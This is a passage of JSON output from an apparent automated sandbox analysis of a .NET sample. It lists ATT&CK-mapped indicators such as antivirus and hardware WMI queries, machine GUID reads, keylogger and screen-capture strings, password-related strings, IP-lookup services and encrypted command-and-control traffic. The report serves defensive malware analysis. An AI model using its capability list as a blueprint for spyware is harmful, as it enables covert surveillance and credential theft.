"relevance": 1, "name": "Contains ability to query the machine version", "description": "Org.BouncyCastle.Asn1.Pkcs.PrivateKeyInfo::GetVersionValue(Org.BouncyCastle.Asn1.DerInteger) at 3c967ba67c97bd75f817c034d7c5180a-6004ed7-ctor", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"SELECT * FROM Win32_BIOS\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_BaseBoard\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Select * From Win32_ComputerSystem\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_DisplayConfiguration\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM AntivirusProduct\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM FirewallProduct\" (Indicator: \"select * from \"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" queries volume information of \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" at 00000000-00005644-0000010C-4373403", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009d001c02000000000000000000000000000000000000140098001c0200000000000000000000086d220000000000200000000000000000000000804a2400f8692200186b2200d0992400c06e22000000000094f35b0000000000f0f55b0095e1f7763d33f701feffffffff2bfb769a2afb7664c50876b69ffb76000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c50876d099240064c50876 (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"IsWow64Process\" with parameter \"5644\" - (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-79", "type": 1, "relevance": 3, "name": "Contains ability to retrieve system language", "description": "Gma.System.MouseKeyHook.WinApi.KeyboardNativeMethods::GetKeyboardLayout(System.Int32) at 3c967ba67c97bd75f817c034d7c5180a-6000980-KeyboardNativeMethods~GetActiveKeyboard", "origin": "Hybrid Analysis Technology", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"P~AeS\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"PQAeS~\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"mChacha20\" (Indicator: \"chacha\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_plain_RIPEMD160\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_80\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_80\" (Indicator: \"aes128\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_plain_SHA1\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"id_TA_ECDSA_SHA_1\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"EncryptionECDsaWithSha1\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_sha1\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_plain_SHA512\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"IdEcdsaWithSha3_512\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"id_TA_ECDSA_SHA_512\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"THREEFISH_512\" (Indicator: \"threefish\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"EncryptionECDsaWithSha512\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_secp521r1_sha512\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_brainpoolP512r1tls13_sha512\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_32\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_32\" (Indicator: \"aes128\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecka_eg_SessionKDF_AES192\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecka_eg_SessionKDF_AES192\" (Indicator: \"aes192\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"AES_192\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Aes192\" (Indicator: \"aes\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Aes192\" (Indicator: \"aes192\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ECDsaWithSha2\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"THREEFISH_1024\" (Indicator: \"threefish\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"ecdsa_plain_SHA224\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"IdEcdsaWithSha3_224\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"id_TA_ECDSA_SHA_224\" (Indicator: \"ecdsa\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"CreateDC\" (Indicator: \"CreateDC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"SELECT Caption FROM Win32_OperatingSystem\" (Indicator: \" Win32_OperatingSystem\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_BIOS\" (Indicator: \" Win32_BIOS\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_BaseBoard\" (Indicator: \" Win32_BaseBoard\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Select * From Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Indicator: \" Win32_OperatingSystem\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"SELECT * FROM AntivirusProduct\" (Indicator: \"antivirusproduct\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"passwordBasedMac\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"password_value\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Export of key material requires extended_master_secret\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"no password supplied when one expected\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"cannot export keying material without extended_master_secret\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"BCrypt password must be <= 72 bytes\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Missing password.\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"extended_master_secret\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"password\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"extended master secret\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"master secret\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"PKCS12 key store MAC invalid - wrong password or corrupted file.\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"password supplied for keystore that does not require one\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"No password finder specified, but a password is required\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Password is null, but a password is required\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Partner MacTag validation failed. Therefore, the password, MAC, or digest algorithm of each participant does not match.\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"verification requires password check\" (Indicator: \"password\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"can't create secret key object:\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"exception decrypting secret key\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"secret key ring doesn't start with secret key tag: tag 0x\" (Indicator: \"secret\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"<p class=\\\"h\\\">[Esc]</p>\" (Indicator: \"[esc]\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"290174202237,5724,3209,,LookupAccountSidW,advapi32.dll,\"1122:31:30.482\",RX=0,PX=0\" (Indicator: \"LookupAccountSid\"; Source: \"00000000-00005644.00000003.73672.00220000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "stream-136", "type": 1, "relevance": 5, "name": "Contains ability to retrieve user privileges", "description": "System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) at 3c967ba67c97bd75f817c034d7c5180a-600003d-ctor", "origin": "Hybrid Analysis Technology", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"org.bouncycastle.asn1.ua\"\n Heuristic match: \"org.bouncycastle.math.ec\"\n Heuristic match: \"org.bouncycastle.crypto.ec\"\n Heuristic match: \"org.bouncycastle.asn1.gm\"\n Heuristic match: \"org.bouncycastle.math.ec.custom.gm\"\n Heuristic match: \"org.bouncycastle.crypto.io\"\n Heuristic match: \"org.bouncycastle.utilities.io\"\n Pattern match: \"https://ipwho.is/\"\n Pattern match: \"https://stackoverflow.com/q/11564914/23354\"\n Pattern match: \"https://stackoverflow.com/q/14436606/23354\"\n Pattern match: \"https://api.ipify.org/\"\n Pattern match: \"https://stackoverflow.com/q/2152978/23354\"\n Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Heuristic match: \"ystem.se\"\n Heuristic match: \"rsaprotectedconfigurationprovider,system.co\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-98", "type": 2, "relevance": 1, "name": "Possibly tries to communicate over SSL connection (HTTPS)", "description": "Found HTTPS url \"https://ipwho.is\"\n Found HTTPS url \"https://stackoverflow.com\"\n Found HTTPS url \"https://api.ipify.org\"", "origin": "File/Memory", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>+cce1c58590\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"ystem,<IPv4>,,b77a5c561934e089\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, CU\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>, Cul\"\n Potential IP \"<IPv4>\" found in string \"=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" />\", \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-438", "type": 2, "relevance": 3, "name": "Contains ability to perform AES/RC4 encryption (API string)", "description": "Found reference to API \"CryptHashData\" (Indicator: \"CryptHashData\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-108", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption (API string)", "description": "Found reference to API \"description=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00000464.00000000.73933.001E0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-280", "type": 2, "relevance": 1, "name": "Contains reference to cryptographic keys", "description": "Found string \"[PRIVATE KEY LOCATION: \"{0}\"]\" (Indicator: \"private key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Private key passed - public key expected.\" (Indicator: \"private key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Private key passed - public key expected.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Public Key:\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Public key presented not for certificate signature\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Public key certificate for attribute certificate cannot be searched.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Subject public key cannot be decoded.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Public key of issuer certificate of CRL could not be retrieved.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Attribute certificate issuer is also a public key certificate issuer.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Public key certificate specified in base certificate ID for attribute certificate cannot be found.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Certification path for public key certificate of attribute certificate could not be build.\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Trusted CA Public Key:\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"expected public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Unrecognized curve OID for GostR3410x2001 private key\" (Indicator: \"private key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"algorithm identifier in private key not recognised\" (Indicator: \"private key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"error recovering GOST3410_2001 public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"invalid length for GOST3410_2001 public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"error recovering GOST3410_94 public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"error recovering GOST3410_2012 public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"invalid length for GOST3410_2012 public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"algorithm identifier in public key not recognised:\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Expected a public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Expected a private key\" (Indicator: \"private key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"invalid DH public key\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"OID is not a valid public key parameter set\" (Indicator: \"public key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"EOF encountered in middle of Ed25519 private key\" (Indicator: \"private key\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains ability to perform AES/RC4 encryption (API string)\n Matched sigs: Contains key cryptographic functions (API string)\n Matched sigs: Contains ability to perform encryption (API string)\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider\n Matched sigs: Contains reference to cryptographic keys\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in 